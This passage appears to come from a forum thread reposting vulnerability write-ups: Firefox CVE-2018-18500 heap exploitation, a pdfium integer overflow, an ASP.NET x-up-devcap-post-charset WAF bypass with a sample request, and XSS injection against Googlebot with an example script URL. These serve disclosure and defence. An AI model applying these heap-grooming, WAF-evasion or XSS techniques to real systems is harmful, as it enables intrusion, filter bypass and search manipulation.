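    this.availableRuns = [];  // base addresses of de-allocated runs
    this.current = new Map(); // sizeClass -> run currently being filled
  }
  malloc(sizeClass) {
    let run = this.current.get(sizeClass);
    if (!run || (run.used + 1) * sizeClass > 0x1000) {
      const base = this.availableRuns.length
        ? this.availableRuns.shift()     // recycle a freed run
        : (this.nextPage++) * 0x1000;    // or carve out a fresh page
      run = { base, used: 0, live: 0 };
      this.current.set(sizeClass, run);
    }
    run.live++;
    return { addr: run.base + run.used++ * sizeClass, run };
  }
  free(alloc) {
    if (--alloc.run.live === 0) this.availableRuns.push(alloc.run.base);
  }
}

const heap = new ToyHeap();
const big = Array.from({ length: 4 }, () => heap.malloc(0x1000));
big.forEach((a) => heap.free(a));  // all 0x1000 runs become available
const small = heap.malloc(0x400);  // a new 0x400 run recycles one of them
console.log(small.addr === big[0].addr); // true
```

The final allocation demonstrates the property the exploit relies on: a 0x400-class object landing at an address that previously held a 0x1000-class buffer.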

    General direction for exploitation

    Considering the basic primitive of memory corruption this bug allows for, the exploitation approach would be trying to plant an object in place of the freed mHandles allocation, so that overwriting it with a memory address pointer at a given offset will be helpful for advancing in our exploitation effort.

    A good candidate would be the “ArrayObjects inside ArrayObjects” technique [TSOF] where we would place an ArrayObject object in place of mHandles, and then overwrite its length header variable with a memory address (which is a very large numeric value) using the bug so that a malformed ArrayObject object is created and is accessible from JavaScript for reading and writing of memory much further than legitimately intended, since index access to that malformed array is validated against the length value that was corrupted.

    But after a bit of experimentation it became apparent that this does not work. The reason is a change in the code, pushed in October 2017, that separates allocations made by the JavaScript engine from other allocations by forcing the usage of a different heap arena. Thus allocations from js_malloc() (a JavaScript engine function) and moz_xmalloc() (a regular function) will not end up in the same heap run without some effort. This renders the technique mostly obsolete, or at least its straightforward version.

    So another object type has to be found for this.

    XMLHttpRequestMainThread as memory corruption target

    We are going to talk about XMLHttpRequest again, this time from a different angle. XHR objects can be configured to receive the response in a couple of different ways, one of them is through an ArrayBuffer object:

     1  var oReq = new XMLHttpRequest();
     2  oReq.open("GET", "/myfile.png", true);
     3  oReq.responseType = "arraybuffer";
     4
     5  oReq.onload = function (oEvent) {
     6    var arrayBuffer = oReq.response;
     7    if (arrayBuffer) {
     8      var byteArray = new Uint8Array(arrayBuffer);
     9      for (var i = 0; i < byteArray.byteLength; i++) {
    10        // do something with each byte in the array
    11      }
    12    }
    13  };
    14
    15  oReq.send(null);

    This is the engine function that’s responsible for creating an ArrayBuffer object with the received response data, invoked upon accessing the XMLHttpRequest‘s object response property (line 6):

     
    JSObject* ArrayBufferBuilder::getArrayBuffer(JSContext* aCx) {
      if (mMapPtr) {
        JSObject* obj = JS::NewMappedArrayBufferWithContents(aCx, mLength, mMapPtr);
        if (!obj) {
          JS::ReleaseMappedArrayBufferContents(mMapPtr, mLength);
        }
        mMapPtr = nullptr;
     
        // The memory-mapped contents will be released when the ArrayBuffer
        // becomes detached or is GC'd.
        return obj;
    }

    In the above code, if we modify mMapPtr before the function begins we will get an ArrayBuffer object pointing to whatever address we put in mMapPtr instead of the expected returned data. Accessing the returned ArrayBuffer object will allow us to read and write from the memory pointed to by mMapPtr.

     

    To prime an XHR object into this conveniently corruptible state, it needs to be put into a state where an actual request has been sent and is awaiting response. We can set the resource being requested by the XHR to be a Data URI, to avoid the delay and overhead of network activity:
    xhr.open("GET", "data:text/plain,xxxxxxxxxx", true);

    mMapPtr is contained inside the ArrayBufferBuilder member object (mArrayBufferBuilder) of the XMLHttpRequestMainThread class, which is the actual implementation class of XMLHttpRequest objects internally. Its size is 0x298:

    0x298.png?w=640

    Allocations of size 0x298 go into a 0x400 size class bin, therefore an XMLHttpRequestMainThread object will always be placed in a memory address that belongs to one of these patterns: 0xXXXXXXXXX000, 0xXXXXXXXXX400, 0xXXXXXXXXX800, or 0xXXXXXXXXXc00. This synchronizes nicely with the pattern of mHandles allocations which is 0xXXXXXXXXX000.

    To corrupt an XHR’s mArrayBufferBuilder.mMapPtr value using the bug we would have to aim for an offset of 0x250 bytes into the freed mHandles allocation:

    xhr_arraybufferbuilder.png?w=640
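Since each mHandles slot is 8 bytes wide, the 0x250-byte offset fixes the required value of mHandlesUsed (assuming the corrupted XMLHttpRequestMainThread object sits at the base of the recycled allocation):

```javascript
// The bug writes at mHandles base + mHandlesUsed * 8, so landing on
// mArrayBufferBuilder.mMapPtr at offset 0x250 requires:
const slot = 0x250 / 8;
console.log(slot); // 74 -> 74 elements must be parsed before the custom one
```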

    So XMLHttpRequestMainThread is a fitting target for exploitation of this memory corruption, but its size class is different from mHandles‘s, requiring us to rely on performing the “Run recycling” technique.

    To aid in performing the precise heap actions required for “grooming” the heap to behave this way, we are going to be using another object type:

    FormData for Heap Grooming

    Simply put, FormData is an object type that holds sets of key/value pairs supplied to it.

    var formData = new FormData();
    formData.append("username", "Groucho");
    formData.append("accountnum", "123456");

    Internally it uses the data structure FormDataTuple to represent a key/value pair, and a member variable called mFormData to store the pairs it’s holding:
    nsTArray<FormDataTuple> mFormData;

    mFormData is initially an empty array. Calls to the append() and delete() methods add or remove elements in it. The nsTArray class uses a dynamic memory allocation for storing its elements, expanding or shrinking its allocation size as necessary.

    This is how FormData chooses the size of allocation for this storage buffer:

    nsTArray_base<Alloc, Copy>::EnsureCapacity(size_type aCapacity,
                                               size_type aElemSize) {
        ...
        size_t reqSize = sizeof(Header) + aCapacity * aElemSize;
        ...
        // Round up to the next power of two.
        bytesToAlloc = mozilla::RoundUpPow2(reqSize);
        ...
        header = static_cast<Header*>(ActualAlloc::Realloc(mHdr, bytesToAlloc));

    Given that sizeof(Header) == sizeof(nsTArrayHeader) == 8 and aElemSize == sizeof(FormDataTuple) == 0x30, this is the formula for the buffer allocation size as a function of the number of elements in the array (aCapacity):

    bytesToAlloc = RoundUpPow2(8 + aCapacity * 0x30)

    From this we can calculate that mFormData will perform a 0x400-byte realloc() call upon the 11th pair appended to it, an 0x800-byte realloc() upon the 22nd pair, and a 0x1000-byte realloc() upon the 43rd pair. The buffer’s address is stored in mFormData.mHdr.
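Plugging numbers into the formula confirms these thresholds (RoundUpPow2 here is a sketch that simply rounds up to the next power of two):

```javascript
// bytesToAlloc = RoundUpPow2(8 + aCapacity * 0x30)
function roundUpPow2(n) {
  let p = 1;
  while (p < n) p *= 2;
  return p;
}
const bytesToAlloc = (pairs) => roundUpPow2(8 + pairs * 0x30);

console.log(bytesToAlloc(10).toString(16)); // "200": 10 pairs still fit in 0x200
console.log(bytesToAlloc(11).toString(16)); // "400": the 11th pair triggers 0x400
console.log(bytesToAlloc(22).toString(16)); // "800"
console.log(bytesToAlloc(43).toString(16)); // "1000"
```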

    To cause the de-allocation of mFormData.mHdr we can use the delete() method. It takes as parameter a single key name to remove from the array, but different pairs may use the same key name. So if the same key name is reused for every appended pair, calling delete() on that key name will clear the entire array in one call. Once a nsTArray_base object is reduced to hold 0 elements, the memory in mHdr will be freed.

    To summarize, we can use FormData objects to arbitrarily perform allocations and de-allocations of memory of particular sizes in the Firefox heap.

    Knowing this, these are the steps we can take for placing a 0x400 size class allocation in place of a 0x1000 size class allocation (an implementation of “Run recycling”):

    1. Spray 0x1000 allocations
      • Create many FormData objects, and append 43 pairs to each of them. Now the heap contains many chunks full of mostly contiguous 0x1000 runs holding our mFormData.mHdr buffers.
    2. “Poke holes” in memory
      • Use delete() to de-allocate some of the mFormData.mHdr buffers, so that there are free 0x1000-sized spaces in between blocks of mFormData.mHdr allocations.
    3. Trigger mHandles‘s allocation
      • Append the child iframe, causing the creation of an HTML parser and with it an nsHtml5TreeBuilder object with an mHandles allocation. Due to the “LIFO free list” property, mHandles should get the same address as one of the buffers de-allocated in the previous step.
    4. Free mHandles
      • Trigger the parser abort described earlier (location.replace() plus a synchronous XHR inside the custom element constructor), so that the nsHtml5StreamParser object, and with it mHandles, is de-allocated.
    5. Free all 0x1000 allocations
      • Use delete() on all remaining FormData‘s.
    6. Spray 0x400 allocations
      • Create many XMLHttpRequest objects.

    Image illustrations:

    step123_green.png?w=640&h=334

    step456_green.png?w=640&h=561

    If done correctly, triggering the bug after executing these steps will corrupt one of the XMLHttpRequest objects created in step 6, so that its mArrayBufferBuilder.mMapPtr variable now points to an HTML element object.
    We can go on to iterate through all the created XHR objects and check their response property. If any of them contains unexpected data ("xxxxxxxxxx" would be the expected response for the Data URI request previously used here) then it must have been successfully corrupted as a result of the bug, and we now have an ArrayBuffer object capable of reading and writing the memory of the newly created HTML element object.

    This alone would be enough for us to bypass ASLR by reading the object’s member variables, some of them pointing to variables in Firefox’s main DLL xul.dll. Also control of program execution is possible by modifying the object’s virtual table pointer. However as previously mentioned this HTML element object is left orphaned, cannot be referenced by JavaScript and is slated for de-allocation, so another approach has to be taken.

    If you look again at the ArrayBufferBuilder::getArrayBuffer function quoted above, you can see that even in a corrupted state, the created ArrayBuffer object is set to have the same length as it would have for the original response, since only mMapPtr is modified, with mLength being left intact.

    Since the response size is going to be the same size we choose the requested Data URI to be, we can set it arbitrarily and make sure the malformed ArrayBuffer‘s length is big enough to cover not only the HTML element it will point to, but to extend its reach of manipulation to a decent amount of memory following the HTML element.

    The specific type of HTML element object to be written into mMapPtr is determined by the base type of HTML element we choose to extend with our custom element definition. HTML element objects range in size between 0x80 and 0x6d8:

    html_elements_sizes.png?w=640

    Thus we can choose between different heap size classes to target for manipulation by the malformed ArrayBuffer. For example, choosing to extend the “br” HTML element will result in a pointer to an HTMLBRElement (size 0x80) object being written to mMapPtr.

    As stated in the definition of heap bins, the memory immediately following the HTML element will hold other allocations of the same size class.
    To target the placement of a specific object right after the HTML element we can take advantage of the “Same size class allocations are contiguous” heap property and:

    1. Find an HTML element of the same size class as the targeted object, and base the custom element definition on it.
    2. Exhaust the relevant bin’s free list by allocating many instances of the same HTML element type. This fits well with the objective corruption offset of 0x250 bytes, because defining many elements prior to the custom one is a necessity for reaching this offset, and it conveniently helps us accomplish the exhaustion as well.
    3. Allocate the object targeted for placement as soon as possible after the allocation of the custom HTML element object. The custom element’s constructor is invoked right after that, so the object should be created first thing inside the constructor function.

    The most straight-forward approach to take advantage of this capability would be to make use of what we already know about XMLHttpRequest objects and use it as the target object. Previously we could only corrupt mMapPtr with a non-controllable pointer, but now with full control over manipulation of the object we can arbitrarily set mMapPtr and mLength to be able to read and write any address in memory.

    However XMLHttpRequestMainThread objects belong in the 0x400 size class and no HTML element object falls under the same size class!

    So another object type has to be used. The FileReader object is somewhat similar to XMLHttpRequest, in that it reads data and can be made to return it as an ArrayBuffer.

    var arrayBuffer;
    var blob = new Blob(["data to read"]);
    var fileReader = new FileReader();
    fileReader.onload = function(event) {
        arrayBuffer = event.target.result;
        if (arrayBuffer) {
            var byteArray = new Uint8Array(arrayBuffer);
            for (var i = 0; i < byteArray.byteLength; i++) {
                    // do something with each byte in the array
            }
        }
    };
    fileReader.readAsArrayBuffer(blob);

    Similar to the case with XMLHttpRequest, FileReader uses the ArrayBuffer creation function JS::NewArrayBufferWithContents with its member variables mFileData and mDataLen as parameters:

    nsresult FileReader::OnLoadEnd(nsresult aStatus) {
      ...
      // ArrayBuffer needs a custom handling.
      if (mDataFormat == FILE_AS_ARRAYBUFFER) {
        OnLoadEndArrayBuffer();
        return NS_OK;
      }
      ...
    }
     
    void FileReader::OnLoadEndArrayBuffer() {
      ...
      mResultArrayBuffer = JS::NewArrayBufferWithContents(cx, mDataLen, mFileData);

    If we can corrupt the FileReader object in memory between the call to readAsArrayBuffer() and the scheduling of the onload event using the malformed ArrayBuffer we previously created, we can cause FileReader to create yet another malformed ArrayBuffer but this time pointing to arbitrary addresses.

    The FileReader object is suitable for exploitation here because of its size:

    [Image: debugger output of sizeof(FileReader)]

    which is compatible with the “img” element (HTMLImageElement), whose object size is 0x138.

    [Image: illustration of a malformed ArrayBuffer pointing to a custom element, but also able to reach some of the adjacent FileReader objects]

    Creation and usage of objects in aborted document

    Another side effect of aborting the child iframe document is that any XMLHttpRequest or FileReader object created inside it gets detached from its “owner” and is no longer usable in the way we desire.

    Since we require the creation of new XMLHttpRequest and FileReader objects at a specific point in time, while the custom element constructor is running inside the child iframe document, but also require their usage after the document load has been aborted, we can “synchronously” pass execution to the main page by combining postMessage() with event loop spinning using a synchronous XHR:

    sync.html:

    [Image: sync.html source code]

    sync2.html:

    [Image: sync2.html source code]

    Running the two pages will yield the output:
    point 1 (child iframe)
    point 2 (main page)
    point 3 (child iframe)

    This way we can enable JavaScript code running from the child iframe to signal and schedule the execution of a JavaScript function in the main page, and be guaranteed it finishes running before gaining control back.

    PoC

    The PoC builds on everything described above to produce an ArrayBuffer that can be used to read and write memory at 0x4141414141414141. It does not succeed on every attempt, but it has been tested successfully on Windows and Linux.

    The HTML file is meant to be served by the provided HTTP server script delay_http_server.py, which adds the necessary artificial delay to responses.

    $ python delay_http_server.py 8080 &
    $ firefox http://127.0.0.1:8080/customelements_poc.html
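
    delay_http_server.py is not reproduced in the post; a minimal sketch of what such a delaying server can look like (the delay value and handler details here are assumptions, not the actual SophosLabs script):

```python
import sys
import time
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer


class DelayHandler(SimpleHTTPRequestHandler):
    """Serve files from the current directory, but stall every response so
    the browser gets a window in which the document load can be aborted."""

    DELAY_SECONDS = 0.5  # assumed value; tune until the race is reliable

    def do_GET(self):
        time.sleep(self.DELAY_SECONDS)
        super().do_GET()


if __name__ == "__main__":
    port = int(sys.argv[1]) if len(sys.argv) > 1 else 8080
    ThreadingHTTPServer(("127.0.0.1", port), DelayHandler).serve_forever()
```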

    You can find the proof-of-concept files on the SophosLabs GitHub repository.

    Fix

    The bug was fixed in Firefox 65.0 with this commit.

    Mozilla fixed the issue by declaring a RAII-type variable that holds a reference to the HTML5 stream parser object for the duration of the two functions that call nsHtml5TreeOperation::Perform: nsHtml5TreeOpExecutor::RunFlushLoop and nsHtml5TreeOpExecutor::FlushDocumentWrite.

    +  RefPtr<nsHtml5StreamParser> streamParserGrip;
       if (mParser) {
    +    streamParserGrip = GetParser()->GetStreamParser();
    +  }
    +  mozilla::Unused << streamParserGrip;  // Intentionally not used within function

     

    About the Author

    Offensive Security Researcher at SophosLabs

    More from Yaniv >

     

    Sursa: https://news.sophos.com/en-us/2019/04/18/protected-cve-2018-18500-heap-write-after-free-in-firefox-analysis-and-exploitation/

  9. Google Chrome pdfium shading drawing integer overflow leads to RCE

    Vulnerability Credit

    Zhou Aiting(@zhouat1) of Qihoo 360 Vulcan Team

    1. Vulnerability Description

    CVE: CVE-2018-6120

    Affected versions: Chrome version < 66.0.3359.170

    2. Vulnerability analysis

    2.1 Vulnerability type

    Run poc file, get the ASAN crash dump:


    Figure 1

    2.2 Vulnerability root cause

    1) The code corresponding to the crash point is shown in Figure 2:


    Figure 2 crash point code

    Since the value of m_nOrigOutputs exceeds the space that was actually requested for the array, an out-of-bounds write occurs at line #55 of Figure 2.

    2) Array declaration and the size of the allocation:

    The source code corresponding to the ASAN crash dump stack:


    Figure 3 The source code around ASAN crash dump

    With the help of the ASAN crash dump, we can locate the relevant source code: the size of the array is determined by the return value of the function below.


    Figure 4 Calculation of the required space of the array

    In Figure 4, setting a breakpoint at code line #100 and running multiple times shows that the value of total overflows when parsing the poc file.
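
    The wrap itself is easy to reproduce. A hedged Python sketch of how a uint32_t size computation silently truncates (the operand names and counts are illustrative, not pdfium’s actual variables):

```python
UINT32_MASK = 0xFFFFFFFF

def required_space(n_outputs: int, n_samples: int) -> int:
    # C's uint32_t arithmetic wraps modulo 2**32 instead of failing.
    return (n_outputs * n_samples) & UINT32_MASK

# Sane input: the product is the real buffer size.
assert required_space(3, 4) == 12

# Attacker-chosen counts from the PDF: the true product is 2**33, but the
# computed total wraps to 0, so a tiny buffer is allocated while the
# shading-drawing loop still writes the full number of outputs.
assert required_space(0x40000000, 8) == 0
```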

    3. Vulnerability exploit

    Since the variables (m_nOrigOutputs, m_Exponent) can be precisely controlled by setting the corresponding fields in the pdf file, we can simplify the assignment: control m_Exponent = 0, so that FXSYS_pow(input, m_Exponent) is always 1.


    Figure 5

    The contents of m_pEndValues array come from the pdf file and are fully controllable, so it’s very simple to exploit this vulnerability.


    Figure 6 The contents of the overflow array are fully controllable

    4. Demo


    Figure 7 hijacking instruction register

    5. Vulnerability Patch

    The Chrome team fixed the vulnerability quickly:


    Figure 8 Google Fixed the vulnerability


    Figure 9 Fixing code _1

    FX_SAFE_UINT32 replaces the previous uint32_t. In its memory representation, the upper four bytes hold the unsigned int value and the lower four bytes hold the overflow flag.


    Figure 10

    Since the operators are overloaded, overflow is automatically checked whenever a numerical calculation is done on this type, ensuring that overflow and underflow cannot occur. The check uses the compiler’s built-in overflow detection function __builtin_add_overflow. Once an overflow occurs, the function containing result_array returns directly. (See Figure 10)
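
    The idea behind FX_SAFE_UINT32 can be modelled in Python (a sketch of the value-plus-validity pattern, not of pdfium’s actual template):

```python
UINT32_MAX = 0xFFFFFFFF

class SafeUint32:
    """A value paired with a validity flag: any operation that would
    overflow 32 bits poisons the result instead of wrapping."""

    def __init__(self, value=0, valid=True):
        self.valid = valid and 0 <= value <= UINT32_MAX
        self.value = value & UINT32_MAX

    def __add__(self, other):
        if isinstance(other, SafeUint32):
            return SafeUint32(self.value + other.value, self.valid and other.valid)
        return SafeUint32(self.value + int(other), self.valid)

# Normal arithmetic passes through untouched...
assert (SafeUint32(40) + 2).value == 42
# ...but an overflowing addition is flagged, letting the caller return
# early the way the patched function does.
assert (SafeUint32(UINT32_MAX) + 1).valid is False
```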


    Figure 11 Fixing code _2

    6. Attack again

    Affected versions: Chrome Version < 67.0.3396.99

    After the official fix of CVE-2018-6120 was out, we noticed such data type:

    CFX_FixedBufGrow<float, 16>, its constructor is shown in Figure 12:


    Figure 12. Constructor for CFX_FixedBufGrow

    CFX_FixedBufGrow<float, 16> result_array(total_results) means:

    (1) When the required space is not greater than 16, the stack space of 16 float types is returned;

    (2) Otherwise use the parameter (total_results) to request a piece of memory on the heap.

    The problem is that the argument passed in here is unsigned int, while the formal parameter is int.

    The CVE-2018-6120 out-of-bounds write can therefore be triggered again :)
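
    The conversion at the heart of this re-trigger can be sketched as follows (the concrete count 0x80000010 is hypothetical, chosen only to show the sign flip):

```python
def as_int32(value: int) -> int:
    """Reinterpret an unsigned 32-bit value as C's signed int."""
    value &= 0xFFFFFFFF
    return value - 0x100000000 if value >= 0x80000000 else value

STACK_SLOTS = 16  # the <float, 16> template parameter

def uses_stack_buffer(total_results: int) -> bool:
    # The constructor compares the now-signed formal parameter against 16.
    return as_int32(total_results) <= STACK_SLOTS

# A huge unsigned count goes negative after the implicit conversion, so the
# constructor hands back the 16-float stack buffer while the caller still
# writes total_results floats into it: out-of-bounds write again.
assert as_int32(0x80000010) < 0
assert uses_stack_buffer(0x80000010) is True
```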

    For the latest stable version, the new vulnerability described in this section is no longer exploitable, so we decided to disclose the details here.

    7. Fixed by non-security update

    A functional discussion spanning more than three years once again accidentally killed the bug.

    A non-security update from Chrome last month unexpectedly fixed the vulnerability described in section #6. The reason: after a series of performance tests passed, Chrome removed the CFX_FixedBufGrow type and replaced it with std::vector. For more information, please refer to the link.

    nice work, Google Chrome Team :)


    Figure 13

    8. Vulnerability Reporting Timeline

    2018-04-17 submit bug issue

    2018-04-18 issue fixed

    2018-04-19 issue closed

    2018-05-10 Google credited to Qihoo 360 Vulcan Team

    Ref:

    [1] https://www.chromium.org/Home/chromium-security/pdfium-security

    [2] https://bugs.chromium.org/p/pdfium/issues/detail?id=177

    [3] https://bugs.chromium.org/p/chromium/issues/detail?id=833721

    [4] https://chromereleases.googleblog.com/2018/05/stable-channel-update-for-desktop.html

    Permalink: http://blogs.360.cn/post/google-chrome-pdfium-shading-drawing-integer-overflow-lead-to-rce.html

    -- EOF --

    Posted by admin001 on 2018-07-16 09:40:16, in category Browser Security Vulnerability Analysis, last modified 2018-08-24 08:36:43

     

    Sursa: http://blogs.360.cn/post/google-chrome-pdfium-shading-drawing-integer-overflow-lead-to-rce.html

  10. x-up-devcap-post-charset Header in ASP.NET to Bypass WAFs Again!

    In the past, I showed how the request encoding technique can be abused to bypass web application firewalls (WAFs). The generic WAF solution to stop this technique has been implemented by only allowing whitelisted charset via the Content-Type header or by blocking certain encoding charsets. Although WAF protection mechanisms can normally be bypassed by changing the headers slightly, I have also found a new header in ASP.NET that can hold the charset value which should bypass any existing protection mechanism using the Content-Type header.

    Let me introduce to you, the one and only, the x-up-devcap-post-charset header that can be used like this:

    POST /test/a.aspx?%C8%85%93%93%96%E6%96%99%93%84= HTTP/1.1
    Host: target
    User-Agent: UP foobar
    Content-Type: application/x-www-form-urlencoded
    x-up-devcap-post-charset: ibm500
    Content-Length: 40
     
    %89%95%97%A4%A3%F1=%A7%A7%A7%A7%A7%A7%A7

    As it is shown above, the Content-Type header does not have the charset directive and the x-up-devcap-post-charset header holds the encoding’s charset instead. In order to tell ASP.NET to use this new header, the User-Agent header should start with UP!

    The parameters in the above request were created by the Burp Suite HTTP Smuggler, and this request is equivalent to:

    POST /testme87/a.aspx?HelloWorld= HTTP/1.1
    Host: target
    User-Agent: UP foobar
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 14
    
    input1=xxxxxxx
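
    The translation between the two requests is plain EBCDIC. Python ships the same ibm500 charset under the codec name cp500, so the obfuscated parameters can be reproduced offline by percent-decoding each component to raw bytes and then decoding with the attacker-chosen charset:

```python
from urllib.parse import unquote_to_bytes

CHARSET = "cp500"  # Python's name for ibm500 (EBCDIC)

def decode_component(component: str) -> str:
    return unquote_to_bytes(component).decode(CHARSET)

# The percent-encoded pieces of the obfuscated request above:
assert decode_component("%C8%85%93%93%96%E6%96%99%93%84") == "HelloWorld"
assert decode_component("%89%95%97%A4%A3%F1") == "input1"
assert decode_component("%A7%A7%A7%A7%A7%A7%A7") == "xxxxxxx"
```

    A WAF inspecting the raw body never sees the strings “input1” or “HelloWorld”, which is what makes the charset switch useful for bypasses.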

    I found this header whilst I was looking for something else inside the ASP.NET Framework. Here is how ASP.NET reads the content encoding before it looks at the charset directive in the Content-Type header:

    https://github.com/Microsoft/referencesource/blob/3b1eaf5203992df69de44c783a3eda37d3d4cd10/System/net/System/Net/HttpListenerRequest.cs#L362

    if (UserAgent!=null && CultureInfo.InvariantCulture.CompareInfo.IsPrefix(UserAgent, "UP")) {
        string postDataCharset = Headers["x-up-devcap-post-charset"];
        if (postDataCharset!=null && postDataCharset.Length>0) {
            try {
                return Encoding.GetEncoding(postDataCharset);

    Or

    https://github.com/Microsoft/referencesource/blob/08b84d13e81cfdbd769a557b368539aac6a9cb30/System.Web/HttpRequest.cs#L905

    if (UserAgent != null && CultureInfo.InvariantCulture.CompareInfo.IsPrefix(UserAgent, "UP")) {
        String postDataCharset = Headers["x-up-devcap-post-charset"];
        if (!String.IsNullOrEmpty(postDataCharset)) {
            try {
                return Encoding.GetEncoding(postDataCharset);

    I should admit that the original technique still works on most of the WAFs out there as they have not taken the request encoding bypass technique seriously ;) However, the OWASP ModSecurity Core Rule Set (CRS) quickly created a simple rule for it at the time which they are going to improve in the future. Therefore, I disclosed this new header to Christian Folini (@ChrFolini) from CRS to create another useful rule before releasing this blog post. The pull request for the new rule is pending at https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/1392.

    References:
    https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/request-encoding-to-bypass-web-application-firewalls/
    https://www.slideshare.net/SoroushDalili/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour
    https://soroush.secproject.com/blog/2018/08/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour/
    https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/rare-aspnet-request-validation-bypass-using-request-encoding/
    https://github.com/nccgroup/BurpSuiteHTTPSmuggler/

    This entry was posted in Security Articles and tagged ASP.NET, request encoding, waf, WAF bypass, x-up-devcap-post-charset on May 4, 2019.  

    Sursa: https://soroush.secproject.com/blog/2019/05/x-up-devcap-post-charset-header-in-aspnet-to-bypass-wafs-again/

  11. XSS attacks on Googlebot allow search index manipulation

    Short version:

    Googlebot is based on Google Chrome version 41 (2015), and therefore it has no XSS Auditor, which later versions of Chrome use to protect the user from XSS attacks. Many sites are susceptible to XSS Attacks, where the URL can be manipulated to inject unsanitized Javascript code into the site.

    Since Googlebot executes Javascript, this allows an attacker to craft XSS URLs that can manipulate the content of victim sites. This manipulation can include injecting links, which Googlebot will follow to crawl the destination site. This presumably manipulates PageRank, but I’ve not tested that for fear of impacting real sites rankings.

    I reported this to Google in November 2018, but after 5 months they had made no headway on the issue (citing internal communication difficulties), and therefore I’m publishing details such that site owners and companies can defend their own sites from this sort of attack. Google have now told me they do not have immediate plans to remedy this.

     

    Last year I published details of an attack against Google’s handling of XML Sitemaps, which allowed an attacker to ‘borrow’ PageRank from other sites and rank illegitimate sites for competitive terms in Google’s search results. Following that, I was investigating other potential attacks when my colleague at Distilled, Robin Lord, mentioned the concept of Javascript injection attacks, which got me thinking.

    XSS Attacks

    There are various types of cross-site scripting (XSS) attack; we are interested in the situation where Javascript code inside the URL is included inside the content of the page without being sanitized. This can result in the Javascript code being executed in the user’s browser (even though the code isn’t intended to be part of the site). For example, imagine this snippet of PHP code which is designed to show the value of the page URL parameter:

    [Image: PHP code echoing the page URL parameter without sanitization]

    If someone was to craft a malicious URL where instead of a number in the page parameter they instead put a snippet of Javascript:

    https://foo.com/stores/?page=<script>alert('hello')</script>

    Then it may produce some HTML with inline Javascript, which the page authors had never intended to be there:

    [Image: the resulting HTML with the injected inline JavaScript]

    That malicious Javascript could do all sorts of evil things, such as steal data from the victim page, or trick the user into thinking the content they are looking at is authentic. The user may be visiting a trusted domain, and therefore trust the contents of the page, which are being manipulated by a hacker.
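
    The same vulnerable pattern, sketched in Python rather than PHP (the handler names are hypothetical), together with the one-line fix:

```python
from html import escape
from urllib.parse import parse_qs, urlsplit

def render_stores_page(url: str) -> str:
    """Vulnerable: reflects the 'page' parameter into the HTML verbatim."""
    page = parse_qs(urlsplit(url).query).get("page", ["1"])[0]
    return "<p>Showing page %s of results</p>" % page

def render_stores_page_safe(url: str) -> str:
    """Fixed: anything taken from the URL is HTML-escaped before output."""
    page = parse_qs(urlsplit(url).query).get("page", ["1"])[0]
    return "<p>Showing page %s of results</p>" % escape(page)

attack = "https://foo.com/stores/?page=<script>alert('hello')</script>"
assert "<script>" in render_stores_page(attack)           # payload is live
assert "<script>" not in render_stores_page_safe(attack)  # payload is inert
```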

    Chrome to the rescue

    It is for that reason that Google Chrome has an XSS Auditor, which attempts to identify this type of attack and protect the user (by refusing to load the page):

    [Image: Chrome’s XSS Auditor refusing to load the page]

    So far, so good.

    Googlebot = Chrome 41

    Googlebot is currently based on Chrome version 41, which we know from Google’s own documentation. We also know that for the last couple of years Google have been promoting the fact that Googlebot executes and indexes Javascript on the sites it crawls. Chrome 41 had no XSS Auditor (that I’m aware of, it certainly doesn’t block any XSS that I’ve tried), and therefore my theory was that Googlebot likely has no XSS Auditor.

    So the first step was to check, whether Googlebot (or Google’s Website Rendering Service [WRS], to be more precise) would actually render a URL with an XSS attack. One of my early tests was on the startup bank, Revolut — a 3 year old fintech startup with $330M in funding having XSS vulnerabilities demonstrates the breadth of the XSS issue (they’ve now fixed this example).

    I used Google’s Mobile Friendly Tool to render the page, which quickly confirms Google’s WRS executes the XSS Javascript, in this case I’m crudely injecting a link at the top of the page:

    [Image: the injected link rendered at the top of the Revolut page]

    It is often (as in the case with Revolut) possible to entirely replace the content of the page to create your own page and content, hosted on the victim domain.

    Content + links are cached

    I submitted a test page to the Google index, and then examining the cache of these pages shows that the link being added to the page does appear in the Google index:

    [Image: Google’s cache showing the injected link]

    Canonicals

    A second set of experiments demonstrated (again via the mobile friendly tool) that you can change the canonicals on pages:

    [Image: an injected canonical shown in the Mobile Friendly Tool]

    Which I also confirmed via Google’s URL Inspector Tool, which reports the injected canonical as the true canonical (h/t to Sam Nemzer for the suggestion):

    [Image: the URL Inspector Tool reporting the injected canonical]

    Links are crawled and considered

    At this point, I had confirmed that Google’s WRS is susceptible to XSS attacks, and that Google were crawling the pages, executing the Javascript, indexing the content and considering the search directives within (i.e. the canonicals). The next important stage, is does Google find links on these pages and crawl them. Placing links on other sites is the backbone of the PageRank algorithm and a key factor for how sites rank in Google’s algorithm.

    To test this, I crafted a page on Revolut which contained a link to a page on one of my test domains which I had just created moments before, and had previously not existed. I submitted the Revolut page to Google and later on Googlebot crawled the target page on my test domain. The page later appeared in the Google search results:

    [Image: the test page appearing in Google’s search results]

    This demonstrated that Google was identifying and crawling injected links. Furthermore, Google confirms that Javascript links are treated identically to HTML links (thanks Joel Mesherghi):

    [Image: Google confirming that JavaScript links are treated identically to HTML links]

    All of this demonstrates that there is potential to manipulate the Google search results. However, I was unsure how to test this without actually impacting legitimate search results, so I stopped where I was (I asked Google for permission to do this in a controlled fashion a few days back, but not had an answer just yet).

    How could this be abused?

    The obvious attack vector here is to inject links into other websites to manipulate the search results – a few links from prominent sites can make a very dramatic difference to search performance. OpenBugBounty (https://www.openbugbounty.org/) lists more than 125,000 un-patched XSS vulnerabilities, including 260 .gov domains, 971 .edu domains, and 195 of the top 500 domains (as ranked by the Majestic Million).

    A second attack vector is to create malicious pages (maybe redirecting people to a malicious checkout, or directing visitors to a competing product) which would be crawled and indexed by Google. This content could even drive featured snippets and appear directly in the search results. Firefox doesn’t yet have adequate XSS protection, so these pages would load for Google users searching with Firefox.

    Defence

    The most obvious way to defend against this is to take security seriously and try to ensure you don’t have XSS vulnerabilities on your site. However, given the numbers from OpenBugBounty above, it is clear that this is more difficult than it sounds – which is the exact reason Google added the XSS Auditor to Chrome!

    One quick thing you can do is check your server logs and search for URLs that have terms such as ‘script’ in them, indicating a possible XSS attempt.

    Wrap up

